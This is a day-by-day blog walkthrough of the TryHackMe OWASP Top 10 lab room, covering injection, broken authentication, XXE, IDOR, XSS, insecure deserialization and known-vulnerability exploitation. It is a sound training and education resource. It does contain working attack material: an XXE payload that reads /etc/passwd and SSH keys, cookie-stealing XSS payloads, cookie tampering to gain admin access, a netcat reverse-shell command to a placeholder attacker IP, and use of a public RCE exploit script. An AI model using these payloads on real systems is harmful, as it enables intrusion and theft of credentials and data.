TryHackMe: OWASP Top 10 Writeup
This writeup is going to be based on the OWASP Top 10 room on TryHackMe. The challenges to this room are going to be released on a daily basis so that for 10 days one can focus on one of the Top 10 vulnerabilities whichever has been released for that day. I will try to add every vulnerability task to this article as soon as I complete it.
What is OWASP and what are the Top 10???
Open Web Application Security Project or better known as OWASP is an online community that produces tools, documentations, technologies and many other things related to web security which can be accessed by anyone and at a cost-free rate. Some of the major OWASP projects that I know are ZAP, Juice Shop, obviously the Top 10 and many others.
Coming to the OWASP Top 10, OWASP releases this document called OWASP Top 10 which consists of most critical security risks to web applications. There are many versions of this document released in the past as well. Going through this document would help any individual to develop a better insight regarding some of the major vulnerabilities on the web and not only how to exploit them but also how to protect yourself from those vulnerabilities.
Coming to this room, it does not require any prerequisite knowledge related to these vulnerabilities but one can easily develop some knowledge regarding them. Moving on let’s get started with the
OWASP Top 10 room!
[Task 1] Introduction
This task just provides a list of all the vulnerabilities that are going to be covered in this room.
- Broken Authentication
- Sensitive Data Exposure
- XML External Entity
- Broken Access Control
- Security Misconfiguration
- Cross-Site Scripting
- Insecure Deserialization
- Components With Known Vulnerabilities
- Insufficient Logging and Monitoring
Tasks 2 and 3 are just related to VPN access and daily prize. So, nothing important here.
[Task 4] Injection
This is the point where all the interesting stuff begins. In this task, they have briefed about what an Injection is, how it can be performed and how to defend yourself from such attacks. Following are some major points from the description they have provided:
There are broadly two types of injection attacks:
- SQL Injection: When you exploit some weakness in SQL or database implementation in a web application.
- Command Injection: When you exploit the web app implementation at the system level and run system-level command.
Once such injection attacks are successfully performed, an attacker can easily access, modify or delete important data and sometimes confidential data as well.
Considering the protection from such attacks, the best way is to sanitize all the data coming in from every possible entry-point before it gets processed or executed.
[Task 5] Command Injection
This task provides a brief introduction to command injection. One important point described over here is that once an attacker gets access to the system it is not necessary that he/she will perform some simple malicious tasks like
whoami or some other system-level commands but he/she can also try to pop a shell for themselves and virtually own all the data stored on that server which can be pretty dangerous in several ways.
[Task 6] Command Injection Practical
This task is all about the practical implementation of Command Injection. Though one important thing to be noted here is that we can never find such an easy way to perform command injection out in the real world, this is just for basic practice and develop a simple mindset for such an attack.
The task talks about a simple code snippet that is running behind the URL through which we will be performing command injection. Also, a few Windows and Linux commands are provided which can be tested while performing command injection.
Now, the most interesting part of PRACTICAL IMPLEMENTATION!!!!
First of all, deploy the machine and browse to the URL:
http://<machine_ip>/evilshell.php which would look something like:
Hint: If you are still not able to find the answer try various single digit values and then try to correlate the correct value with the passwd file.
- What strange text file is in the website root directory?
- This question asks about an odd file present in the web root directory. Keep in mind it is asking about the
WEB ROOTdirectory and not the
ROOTdirectory. With the command,
pwdwe get the result as
/var/www/htmlwhich is the
WEB ROOTdirectory. All that needs to be done here is just to run the
lscommand to get a list of all the files present in this directory and find the odd file out.
2. How many non-root/non-service/non-daemon users are there?
- To determine the user on any Linux machine the best way is to take a look at the
/etc/passwdfile using the
catcommand. This file consists of all different accounts present on the system including root, service and daemon accounts. But the question is asking about non-root/non-service/non-daemon users on the system. To find such users we must understand the different account types that are present in the
/etc/passwdfile like root, users, services and daemons. Visit this link to understand the difference between service and daemon accounts. Moreover, in a passwd file, there are different types of shell assigned to users and many times no shell is assigned, we need to understand that as well. Read about such shell over here. Once, we understand all these things we can easily determine the number of non-root/non-service/non-daemon accounts on the system. Refer to this link to get an idea of various default accounts on the system.
Hint: If you are still not able to find the answer try various single digit values and then try to correlate the correct value with the passwd file.
3. What user is this app running as?
- This is a very simple question and can be checked using
4. What is the user’s shell set as?
- We just need to correlate the current user's shell details in the
5. What version of Ubuntu is running?
- Another simple question that can be checked by a single command
6. Print out the MOTD. What favorite beverage is shown?
- This one was a bit confusing question as I did not know what MOTD meant. After some googling, I came to know MOTD stands for ‘Message of The Day’. The issue that I faced with this challenge was before Ubuntu 16 the MOTD was saved in
/etc/motdfile which was not present in this system as it is not running on version 16. But on other versions, the files related to MOTD are stored in the directory
/etc/update-motd.d. We just need to
catthe files present in this folder and go through them to find the answer to this question.
Hint: Check for a file named
With this the Day 1 Injection Challenge completes and I’ll be back again tomorrow when
Broken Authentication challenge begins!!!
Go to Top
July 15, 2020
The challenge we are provided with today is related to
Broken Authentication. The task is very simple and easy to perform. So, let's just begin!
[Task 7] Broken Authentication
The main purpose of this task was mainly just to let us know what exactly does Broken Authentication means, how can it affect, how it is usually performed and how can you protect yourself from this attack. Some of the major points in this task are:
- Authentication is the basic method that uses username and password to allow users access to the web application. Along with that session cookies are used to track users and their activities.
- Some of the major issues that lead to flaws in the authentication mechanism are:
- Bruteforce attacks
- Use of weak passwords
- Weak session cookies
3. When such attacks are performed, an attacker can gain access to the user's personal data including personal files, financial details and others.
4. Some steps that can be taken to mitigate this kind of attack are:
- Setting up an account lockout in case of multiple login failures.
- Implementing multi-factor authentication.
[Task 8] Broken Authentication Practical
Moving on to the practical task for Broken Authentication, they have explained about one of the basic flaws related to user authentication database which is if not handled properly we can register a user with the same username and prepend it with a blank space(
Now, we can start with the questions where we just need to register a new user as explained above on the deployed machine at
hhtp://<machine_ip:8888 and get the flag. The login page would look something like this:
- What is the flag that you found in darren’s account?
- For this question, we just simply need to visit go to the user registration page and register with the username as
‘ darren’. Once registered, we need to log in with the same username and the password used while registering the new user. Doing so will lead us to the user’s homepage from where we can get the flag.
2. What is the flag that you found in arthur’s account?
- Again we need to perform the same steps as we did in the previous step but with the username as
With this, we can wrap up the Broken Authentication challenge. This challenge was really simple as there were no steps that were very difficult.
The next challenge is related to Sensitive Data Exposure, I will add the write-up for the same immediately after the 24-hour buffer ends for that!
Go to Top
July 16, 2020
Sensitive Data Exposure
[Task 9] Sensitive Data Exposure (Introduction)
As the task name suggests, it is going to be an intro to today’s topic. Sensitive data exposure is nothing but can be explained in simple terms as leakage of some personal or confidential information from a web app. This can range from basic user details such as name, age, contact details to some confidential details like financial credentials, security numbers and others.
[Task 10] Sensitive Data Exposure (Supporting Material 1)
This task tells us about the two ways in which data is generally stored in a web app which are:
- Database (eg. MySQL, MariaDB)
- Stored as files (called as “flat-files”)
In this challenge, we are going to work with flat-files. And, also one hint is provided that this flat-file is stored underneath the root directory.
Along with that, a few commands are provided that can be used to solve this challenge:
file <filename>: Provides information regarding the file-type. In the context of this task, we need to find a file of file-type SQLite.
sqlite3 <filename>: Access the SQLite file.
- SQLite commands:
.tables;: Gives a list of tables present in the database
PRAGMA table_info(<tablename>);: Provides the details of the columns in the mentioned table
SELECT * FROM <tablename>;: Print all the content of the table
[Task 11] Sensitive Data Exposure (Supporting Material 2)
This task talks about password hashes. From the previous task, we understood how we can access the content of a table in the database. But this is a known fact that passwords are never stored as plaintext in any database. And the same case is over here, but to keep things easy, passwords are hashed using MD5 hashes.
Along with that, they have mentioned a tool called Crackstation which can be used to break this hash and retrieve the original password from the hash.
[Task 12] Sensitive Data Exposure (Challenge)
Beginning with the actual practical part of this challenge we can move on to the task questions!
- We need to find a directory where information regarding some sensitive data is leaked.
- For this task, we need to deploy the machine and try to look around the web app to find some sort of information leakage. The first point of information leakage on a website that should come to our mind should be comments in the source code of the web app. We can try going through different web pages and look for some comments. The homepage would look like:
We can check the source code by right-clicking on the webpage and selecting the inspect element option. On the homepage, we don’t find anything that would prove to be helpful so we can move on to the login page and see that in the source code there is a comment that mentions the directory where changes are meant to be made. And this directory itself is the answer to the first question.
2. Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?
- This task is pretty simple, we just need to navigate to the directory we found in the previous question. Over there, there is only one file that appears to be odd from the rest of the files and obviously, the name of that file is our answer.
Hint: It is a database file.
3. Use the supporting material to access sensitive data. What is the password hash of the admin user?
- We can download that odd file and then try to perform all the database operations explained in task 9 on it. So, let’s begin with that:
- To open the file we can use the command:
- The next task would be to check the tables in the database:
- We can see two tables over there but only one is of our use which is
- Now, we need to know in what order data is arranged in the table, so we can use the command:
sqlite> PRAGMA table_info(users);
- From these details, we can see that the third column would be containing the password hashes that we need.
- To extract the password we need to print the table ‘users’. And we can do that by using the query:
sqlite> SELECT * FROM users;
- From the printed table, we need the hash in the third column that belongs to ‘admin’ and submit it as the answer for the third question.
4. Crack the hash. What is the admin’s plaintext password?
- This question is pretty simple as we just need to copy the hash value paste it at CrackStation and obtain the decrypted password which can be submitted as the password for this question.
5. Login as the admin. What is the flag?
- As the question suggests, we just need to use the cracked password with the username ‘admin’ and log in. Once, logged in we can see the flag right in front of us!!!
With this, we complete the Sensitive Data Exposure challenge. As I said earlier, this challenge was pretty simple and didn’t take much time to solve as well.
Wait till tomorrow, when I’ll add the walkthrough XML External Entity challenge!!!
Go to Top
July 17, 2020
XML External Entity
In today’s challenge, it was all related to the basics of the XXE attack. As this series is meant for beginners, the challenge was pretty easy to solve. Just required some payload manipulations.
[Task 13] XML External Entity
This task broadly enumerates various attacks that an XXE attack can lead to such as Denial of Service(DoS), Server Side Request Forgery(SSRF), Remote Code Execution (RCE) and port scanning. It also describes to types of XXE attacks:
- In-band attack: Attacker gets an immediate response to XXE payload
- Out-of-band attack (blind XXE): Attacker has to reflect the output of the attack to some other file or their server
[Task 14] XML External Entity — eXtensible Markup Language
This task talks about basics on an XML file. Following are some of the major points from the task:
- XML consists of rules for encoding documents in a human and machine-readable format.
- It is platform independent.
- Changes can be made to an XML document without affecting data presentation.
- XML allows validations using DTD’s and Schema ensuring XML document is free from any syntax error.
- Every XML document starts with a XML Prolog
<?xml version="1.0" encoding="UTF-8"?>
- This determines the XML version and the encoding used, also this line is not compulsory.
- Every XML document must have a ROOT element without which it would be considered invalid.
- Every opening tag must be closed with an identical tag with a preceding
For the first time, in this task certain questions are added based on the theory which are given below:
- Full form of XML
- The answer lies in the task’s name itself :P
2. Is it compulsory to have XML prolog in XML documents?
- It’s optional
3. Can we validate XML documents against a schema?
- That is how we ensure the XML document is free from any errors.
4. How can we specify XML version and encoding in XML document?
- This is defined at the first line of the XML document and a specific term is given to that line
[Task 15] XML External Entity — DTD
As the task name suggests, this task provides some brief information on Document Type Definition (DTD) which is used to define the structure and legal elements of an XML file.
<!DOCTYPE note [ <!ELEMENT note (to,from,heading,body)> <!ELEMENT to (#PCDATA)> <!ELEMENT from (#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body (#PCDATA)> ]>
Some terms that one must know from above payload:
- The value next to
!DOCTYPEis the ROOT element
- The term
!ELEMENTis used to define an element such as it's type (eg. #PCDATA which means parsable character data) or the sub-elements which it consists (
<!ELEMENT note (to,from,heading,body)>)
This task also contains a few questions and answers to them are pretty simple as we just need to add a ‘!’ before the term that is to be defined.
[Task 16] XML External Entity — XXE Payload
In this task, two different payloads are presented. We can see each one of them and try to understand their sole purpose:
- ENTITY assignment
<!DOCTYPE replace [<!ENTITY name "feast"> ]>
- In this payload, the main point that should be focused is the use of an entity for assignment purposes. It can understood as at the beginning of the payload the entity name has been defined as the value “feast”. Later, the same value is used for the value of
lastNameusing the term
2. Payload to read system files
<!DOCTYPE root [<!ENTITY read SYSTEM 'file:///etc/passwd'>]>
- The main purpose of using this payload is to access system files. This is done by defining the path of the system file for a read action. We will be using this payload for solving the challenges in the next task.
[Task 17] XML External Entity — Exploiting
To solve all the questions in this task we need to first deploy the machine and browse to
http://<machine_ip> which would look something like:
- Try to display your own name using any payload.
- This question is pretty simple as we just need to print our name using XXE. For this, we can use the first payload and simply change various values and test the payload like values of
2. See if you can read the /etc/passwd
- This task is also really simple and we can use the second payload from the previous task and just run it on the deployed website.
3. What is the name of the user in /etc/passwd
- This could be found out at the last line of the output from the previous question.
4. Where is falcon’s SSH key located?
- For this question, we first need to know where the SSH key is stored on a Linux machine. After some googling, we can find the exact location and file in which this key is stored and that is
/home/<username>/.ssh/id_rsa. We can change the username value and replace
/etc/passwdin the second payload with this new path. And this new path itself is the answer to the question.
5. What are the first 18 characters for falcon’s private key
- Once we execute the payload that we created in the last task, we can get falcon’s SSH key and from the same key, we need to take out the first 18 characters from the key and use them as the answer to the question.
- P.S. Don’t make a silly mistake by copying those 18 characters from
-----BEGIN RSA PRIVATE KEY-----as the actual key begins after this!!!
So, one more challenge is over and I’ll be back again tomorrow with the write-up for Broken Access Control!!!
Go to Top
July 18, 2020
Broken Access Control
I must say that from all the challenges that were presented till date, today’s challenge was the quickest and easiest. Today, the topic was Broken Access Control and let’s see what all was there!
[Task 18] Broken Access Control
This task explains how some pages are intended to be accessed only by a few users i.e. only a few users can authenticate such confidential pages and/or data. But sometimes, there might be some logical error in the application itself through which a normal user can easily access the information no one is allowed to access.
In simple terms, a normal user when bypasses the required authentication and can access sensitive data it is called Broken Access Contol.
[Task19] Broken Access Control (IDOR Challenge)
Insecure Direct Object Reference (IDOR), as the name suggests is an attack when the link to sensitive is referenced in an insecure way. The best example of an IDOR attack is when you change the parameters passed in the URL and land up on a page that you are not allowed to access.
The challenge today is based on the same logic. So, let’s begin:
We must deploy the machine first and then access the machine IP which would look something like:
We are provided the username and password, using them we can log in and get a lousy text saying
I am noot.
But other than that we can’t see anything else. So, how can the IDOR attack be performed? As explained earlier we can manipulate the values passed in the URL. The URL would look like:
http://<machine_ip>/note.php?note=1 The only parameter that appears to be manipulated here is the value that is passed to
note. We can test several values including negative numbers, 0 and other terms.
Hint: The value is a non-negative integer and less than 10!!!
As we access the right page, we can see the flag just waiting for us!
So, with this the today’s Broken Access Control challenge end. I’ll be back again tomorrow with a writeup for the Security Misconfiguration challenge. Till then, keep hacking!!!
Go to Top
July 19, 2020
[Task 20] Security Misconfiguration
To put it in simple terms, Security Misconfiguration happens when some loopholes are left behind on the application knowing or unknowingly. These misconfigurations might helps the attacker to directly attack the web app or at least help them in some other way to exploit the web app. Some of the security misconfigurations include but are not limited to:
- Improper permissions configuration
- Leaving unnecessary features enabled
- Using default credentials
- Improper error handling
Coming to this challenge, it focuses on
Default Credentials. We are not provided any further details but once we deploy the machine, we can the webpage for a note-taking app.
All that we have here is the username and password field, a link to change the password and another link to swap the theme.
The task earlier talked about default credential, so we can try different default credentials like:
But unfortunately, none of these work. We can try to analyze the JS files as well from the debugger but even there we can’t find anything. Next thing that can be tried is changing the password from the
Change Password link:
But to do so, we’d need the current username and password which we don’t know.
Almost after an hour or so, I thought of googling
PensiveNote but no success over there as well. Then I thought to check the hint, where it says that we don't have the web app's source code but we can try to read the documentation for default credentials. After surfing through all the webpages of the web app, we can be pretty sure that the documentation is not on the box.
It took me another 1 hour to realize that, people sometimes use GitHub to store their web apps’ source code and documentation. So, we can go to GitHub and maybe search for
Pensive Note over there. And the first repository that pops up belongs to
NinjaJc01 who is the creator of this room as well. So, all we need to do next is to read the documentation (README.md) and obtain the much-awaited default credentials. Using these credentials we can login on the web app and get the flag!
As I said earlier, this box gave a realistic feel as there was no information on the box and it made us think one step beyond googling as well!!!
With this, we can conclude today’s challenge. Wait till tomorrow when I’ll add the walkthrough for the XXS challenge!!!
Go to Top
July 20, 2020
Here I am, back again with the walkthrough for one more challenge based on XSS. To be honest, I did not have much of prior knowledge related to XSS but found this challenge pretty simple. For today as well, there was only one task containing all the theory as well as the questions. So, let’s just begin!
[Task 21] Cross-Site Scripting
Cross-Site Scripting (XSS) attack is a type of attack through which you can execute a malicious script on the victim’s machine. There are three types of this attack:
- Reflected XSS: This takes place when the victim clicks on some link that triggers this XSS.
- Stored XSS: When the XXS script is stored directly in the database of the web app.
- DOM-Based XSS: Document Object Model (DOM) is helpful to change the document’s structure, style and content. DOM XSS are the ones that are in the DOM.
Moving on to the questions, let’s deploy the machine and go to
http://machine_ip/stored which would look like:
P.S. When I did this challenge the
/reflected link was not working but it can be accessed from the
/stored link as well.
We need to register with some username and password which will take us to the actual page where we can perform the attacks.
For these questions, once the correct action is performed we will be provided with a flag that is to be used the answer for that specific question:
- The first question wants us to craft a payload that can cause a popup saying “Hello”.
- If we read the theory properly, then we can find a payload that does the same but prints “Hello World!”, we can simply modify that payload and use it.
2. Craft a payload to show a popup having the victim’s IP address.
window.location.hostnamethrough which can capture the victim's IP address. We can use the same payload in previous question and modify it to complete this question.
The next few questions are based on stored XSS.
3. Insert some HTML tags in the comment box.
- We can try to insert any HTML tag to get the flag like:
4. Craft a payload to popup the cookies.
document.cookiesand we can use the same along with script tags to get the flag for this answer.
5. Craft a payload to change “XSS Playground” to “I am a hacker”
document.queryselectorwhich returns the first element within the document that matches the specified selector. So, we need to first find the selector for "XSS Playground".
- To do so, we can simply select the text “XSS Playground”, right-click and go to the
Inspect Elementoption. Then we can see the
idover there somewhat like:
Now we have the object to select the required text, the text’s id and we can use the function
textContent to change the text to whatever value we want and put all of that in a
<script>document.querySelector('#thm-title').textContent = 'I am a hacker'</script>
- We can paste this in the comment box, verify that the text has changed and get the final flag as well.
So, here we complete the XSS challenge as well. And tomorrow I’ll add the walkthrough for
Go to Top
July 21, 2020
In today’s challenge, there was a lot of theory along with quite a lot of questions as well which were distributed in 6 tasks. Today’s writeup might be a bit too lengthy but worth the knowledge. So, let’s begin!!!
[Task 22] Insecure Deserialization
Insecure deserialization is a type of attack that takes the benefits of improper serialization and deserialization methods used in a web app. It can lead to attacks ranging from (Denial of Service) DoS to (Remote Code Execution) RCE.
Usually, this vulnerability is not exploited much as it is on a case by case basis. Also, the success of this attack depends strongly on the skills of the attacker.
- Who developed the Tomcat application?
- The answer to this question can be easily found out by googling
Tomcat developer. You'll get a 3-word name.
The before the 3-word name if your answer is not being accepted.
2. What type of attack that crashes services can be performed with insecure deserialization?
- This is one of the two attacks that are described above in this task.
[Task 23] Insecure Deserialization — Objects
Object-oriented Programming(OOP), as the name suggests the base of this type of programming is the object which is mainly described by two properties it’s state and behavior.
It can be defined as the state is values that the object holds whereas the behavior of an object determines the functions that the object performs.
[Task 24] Insecure Deserialization — Deserialization
Firstly, serialization is the process of converting objects into a format that can be transmitted through systems. Whereas, deserialization is the reverse process that converts data from is converted format to objects again.
Now, insecure deserialization is the process when malicious data is entered by an attacker and it gets directly processed because of the absence of any kind of filtering or input validation.
- What is the name of the base-2 formatting that data is sent across a network as?
- The answer to this question can be directly found by googling ‘base-2 format’.
[Task 25] Insecure Deserialization — Cookies
Cookies are pieces of data that are stored by a website on a user’s computer while they are browsing. These cookies help to store the session details of the user. Some cookies are cleared as soon as the browser is closed whereas some might be saved for a longer period.
Cookies can be set using various programming languages like python or PHP. Different websites use different mechanisms to generate cookies.
- If a cookie had the path of webapp.com/login, what would the URL that the user has to visit be?
- When cookies are declared, the path along which they are valid is also described. The URL on which the cookie is valid is present in the question itself.
2. What is the acronym for the web technology that Secure cookies work over?
- HTTP only in its secure mode supports secure cookies.
Hint: What is the name of the secure mode of HTTP.
[Task 26] Insecure Deserialization — Cookies Practical
For this task, we first need to browse to the deployed machine’s webpage. Then we need to perform all the steps as described on the task which are:
- Create an account
- Then right-click and select inspect element
Here, we can see all the cookies and their values:
- 1st flag (cookie value)
- In the cookies section, we can see a cookie named
sessionidbut it is in base 64 (at it ends with
==). So, we first need to decode it from base64. From the decoded value, we can find the required flag for this answer.
2. 2nd flag (admin dashboard)
- Currently we are logged in as a user, to get the admin flag we need to change our account type to ‘admin’. This can be done by replacing the’user’ with ‘admin’ in the
userTypecookie in the cookies section. Once done, we can go to
http://machine_ip/adminand find the flag on the page itself.
[Task 27] Insecure Deserialization — Remote Code Execution
As mentioned in task 22, insecure deserialization can lead to lead to RCE, that is what we are going to perform in this attack.
For this task, we need to perform the following task:
- First, need to change our account type back to ‘user’ from previously set ‘admin’ and go to
- There we need to click on
Exchange you vimand then on
Provide your feedback.
- To get an RCE shell, we need to start a listener. This can be done by executing the netcat command
nc -nvlp 4444. Here, 4444 is the port on which we are listening.
- They have provided us a python script as well, that can help us establish an RCE connection from the target machine which is:
command = 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | netcat YOUR_TRYHACKME_VPN_IP 4444 > /tmp/f'
- We need to replace YOUR_TRYHACKME_VPN_IP with our system’s local IP address that can be found out using
ifconfigand would be something like
10.x.x.x. In this function, a command has been defined which is later used in the
rce() class. This class is further base64 encoded, which is the value that we would get as output.
- On executing this python script as
python script.py, we will get byte stream as output from which we need only the data between the single quotes(').
- Now all that we need to do is copy this value to ‘encodedPayload’ value in the website’s cookie section and refresh the page.
- This will execute the rce payload and we will get an RCE shell on our listener.
- To find where the flag is located, we can use the command:
find / -name flag.txt 2> /dev/null. We can read the file and find the flag that can be used as the answer to this task's question.
With this, today’s challenge finishes. Tomorrow, I’ll add the walkthrough for
Components with Known Vulnerabilities till then keep hacking!!!
Go to Top
July 22, 2020
Components with Known Vulnerabilities
Today’s challenge is based upon the fact that for most of the software or service that is being used, we can find some or the other form of exploitation on the web that has been discovered by someone. We may find a ready-made script or step-by-step methods to perform an exploit or sometimes even a broken script that we need to fix and then use for exploitation.
[Task 28] Components with Known Vulnerabilities — Explanation
This task just gives a brief on how known vulnerabilities can be searched on the web and can be used to perform exploitation. These vulnerabilities can be found on exploit-db or rapid7. We can also find the CVE details as well for all such vulnerabilities on the web. This vulnerability is also considered as highly risky as anyone can find these vulnerabilities easily on the web and use them for exploitation.
[Task 29] Components with Known Vulnerabilities — Exploitation
There is not much that needs to be explained here as the task is pretty much self-explanatory on how you can pop an RCE. Though this method can be defined roughly in a few steps as:
- Determine the version of the software, application or service.
- Try to find out various exploits related to that specific version on the web (eg. on exploit-db or rapid7)
- If required, make necessary adjustments to the exploit as per requirement.
- Try to implement the exploit.
- Debug if some issue is faced and try again. Else, look for some other exploits and start from step 2.
- If the exploitation succeeds, we can perform the task we want to.
[Task 30] Components with Know Vulnerabilities — Practical
For this challenge, we are not provided with any information on the target. So, it’s totally up to us on how we approach to break this box.
First of all, we need to deploy the machine and visit
http://machine_ip as usual. The webpage would look like:
If it were a normal pentest, we would have looked for everything from the HTML code, JS file running in the background of the page to directory traversal. But as this challenge is focused on known vulnerabilities. We just need to find a service that can be exploited.
From the debugger, we can see there were 2 JS files, one for bootstrap v3.3.5 and the other for jquery v2.1.4 but we can’t find any promising exploit for these.
If we see on the lower-left corner of the web page, we can see a link to
projectworlds. From this website, we can see that they have produced many different PHP projects. We can directly search for exploits related to
projectworlds bookstore exploit as our target is one of their online bookstore projects.
In my case, I found this exploit. There are many other exploits available as well on the web. We can download them and try to use them for exploitation. For some codes, we may find documentation on how to use the script whereas for others we might need to figure out on our own how to use those scripts.
For the current case, we can download the Online Book Store 1.0 — Unauthenticated Remote Code Execution script and try to execute it.
We can try to determine how this script needs to be used by simply running the script without passing it any parameters.
tester@kali:~/Downloads$ python 47887.py
usage: 47887.py [-h] url
47887.py: error: too few arguments
Here, we can see that to run the script we need to pass the URL as a parameter else use the
-h switch to see the help section. So, let's run the script by passing the URL i.e.
http://machine_ip as the parameter to this script. But an issue might come up like given below:
This error was being generated because when the script asked to start the shell and we enter ‘y’ it was not able to define the character. We can try to check the script as well to determine if there is some issue with the script but nothing is wrong over there as well. So, it might be the issue of the compiler so, we can try to run the script with
python3 and see if it works.
As expected, it was the issue with the compiler as
python compiler is for Python2.7 whereas
python3 is for the latest Python3.0. Now the only thing that needs to be done is to run the command to get the word count of passwd file as asked in the question using the command
wc -c /etc/passwd and enter the received value as the answer.
With this, we can complete today’s challenge. Tomorrow is going to be the last day and the last challenge that is
Insufficient Logging and Monitoring. Wait till I add the walkthrough for that till then keep hacking!
Go to Top
July 23, 2020
Insufficient Logging and Monitoring
Today is the last day of OWASP Top 10 challenges and it is about one of the most important fields in Cyber Security. Logging and monitoring is an important part of cybersecurity. It might not appear to be that important at first glance but it improves the efficiency of an organization to protect themselves from attacks as all the events taking place in the network are being logged and monitored in real-time. Hence, providing a proactive solution for any anomaly taking place in the network.
Logging also helps in the post-attack kind of scenarios as it enables us to see what all actions were performed by an attacker to execute the attack. With all that information we can improve our security and be prepared for any such attack in the future.
[Task 31] Insufficient Logging and Monitoring
This is the last task of this challenge and one of the easiest challenges as well. The task explains how logging and monitoring are important. Some major points from the task are:
- Logging helps to trace the actions performed by an attacker.
- Two major impacts of not having logging and monitoring could be:
- Regulatory damage: When the user or client information gets leaked.
- Risk of further attack: Organization might face the same attack and won’t know how to tackle it.
3. Some of the important information that should be logged are:
- HTTP Status Codes
- Time Stamps
- API endpoints/page locations
- IP Addresses
4. Logs themselves contain sensitive information and hence must be stored securely.
5. Monitoring also helps to determine the severity of any anomaly taking place based on the information that has been logged.
Coming to the challenge, we need to download a log file which would look somewhat like:
200 OK 18.104.22.168 jr22 2019-03-18T09:21:17 /login
200 OK 22.214.171.124 rand99 2019-03-18T10:19:22 /login
200 OK 126.96.36.199 afer11 2019-03-18T11:11:44 /login
200 OK 188.8.131.52 rad4 2019-03-18T11:55:51 /login
200 OK 184.108.40.206 bff1 2019-03-18T13:08:59 /login
200 OK 220.127.116.11 hax0r 2019-03-21T16:08:15 /login
401 Unauthorised 18.104.22.168 admin 2019-03-21T21:08:15 /login
401 Unauthorised 22.214.171.124 administrator 2019-03-21T21:08:20 /login
401 Unauthorised 126.96.36.199 anonymous 2019-03-21T21:08:25 /login
401 Unauthorised 188.8.131.52 root 2019-03-21T21:08:30 /login
- What IP address is the attacker using?
- From the logs it is pretty clear that there is one IP address that is trying to access unauthorized data that too with usernames that have higher privileges. The answer to this question is that IP itself.
2. What kind of attack is being carried out?
- It can be seen that different usernames are being used to perform the attack. Also, as mentioned previously all of them are usernames that might have higher privileges. There is only one attack type in which we use a list of usernames and/or passwords to randomly guess the correct login credentials, that attack type is the answer to this question.
With this, we can conclude the OWASP Top 10 challenge. All of these challenges were very helpful in developing basic knowledge regarding the major vulnerabilities that are found out there in the wild. But as this was just a basic introduction to all these vulnerabilities, it is not easy to find them so easily in the real-world environment.
Wish you all the best for your future hacking!!!
Do check my entire GitHub Repository on various TryHackMe rooms at: